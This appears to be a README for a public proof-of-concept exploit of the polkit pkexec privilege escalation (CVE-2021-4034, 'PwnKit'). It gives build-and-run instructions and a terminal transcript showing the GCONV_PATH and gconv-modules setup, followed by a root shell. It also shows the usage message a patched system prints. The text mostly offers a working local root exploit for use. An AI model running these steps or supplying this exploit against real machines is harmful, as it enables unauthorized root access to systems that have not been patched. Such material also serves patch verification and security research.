One day for the polkit privilege escalation exploit
Just execute make, ./cve-2021-4034 and enjoy your root shell.
The original advisory by the real authors is here
If the exploit is working you'll get a root shell immediately:
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exitUpdating polkit on most systems will patch the exploit, therefore you'll get the usage and the program will exit:
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$